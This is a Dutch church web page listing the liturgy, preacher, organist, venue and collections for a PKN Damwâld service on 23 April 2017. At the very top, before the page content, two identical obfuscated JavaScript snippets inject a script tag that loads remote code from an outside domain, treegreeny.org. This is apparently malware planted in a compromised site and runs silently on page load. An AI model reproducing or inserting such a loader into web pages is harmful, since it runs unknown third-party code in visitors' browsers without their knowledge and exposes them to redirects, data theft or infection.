;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 april 2017 9:30 uur - PKN Damwâld
zondag 23 april 2017
09:30 uur

Kerkdienst zondag 23 april 2017 9:30 uur

Thema: Zeker weten.....

Informatie

Voorganger:Ds. G. Oberink, Urk
Organist:Nienke v.d. Heide-Visser
Thema:Zeker weten.....
Liturgie
Lied voor de dienst Elb 124 : 1 en 3
Welkom en mededelingen
Intro : Psalm 149 : 1
Stil gebed , votum en groet .
Aanvangstekst : Handelingen 4 : 12
We zingen: Elb 136 : 1
Wet : Micha 6 : 8
We zingen: Elb 136 : 3
We lezen: Leviticus 19 (ged)
We zingen: Psalm 95 :3
Gebeden .
We zingen: Psalm 95 : 1
We lezen: Lucas 1 : 1-4
We zingen: Gezang 429 : 1
We lezen: 1 Corinthe 15 : 1-9
We zingen: Gezang 429 : 2
We lezen: Handelingen 1 : 3
We zingen: Gezang 429 : 3
Preek Zeker weten .......
We zingen: Elb 125
Gebed .
Dienst der Offeranden
Slotlied Psalm 149 : 5, 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Open Doors

Open Doors steunt Christenen die om hun geloof worden vervolgd of verdrukt. Open Doors brengt Bijbels en Christelijke lectuur naar landen die daarvoor gesloten zijn. Daarnaast geeft Open Doors training en verleent de organisatie praktische hulp, zoals traumazorg en noodhulp.
Open Doors werkt wereldwijd in zo’n vijftig landen. Daarnaast wil Open Doors westerse Christenen betrekken bij de Vervolgde Kerk. Open Doors doet dit omdat ze gelooft dat wanneer één lid lijdt, alle leden meelijden en omdat ze gelooft in de zendingsopdracht en dat alle deuren openstaan voor het Evangelie.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds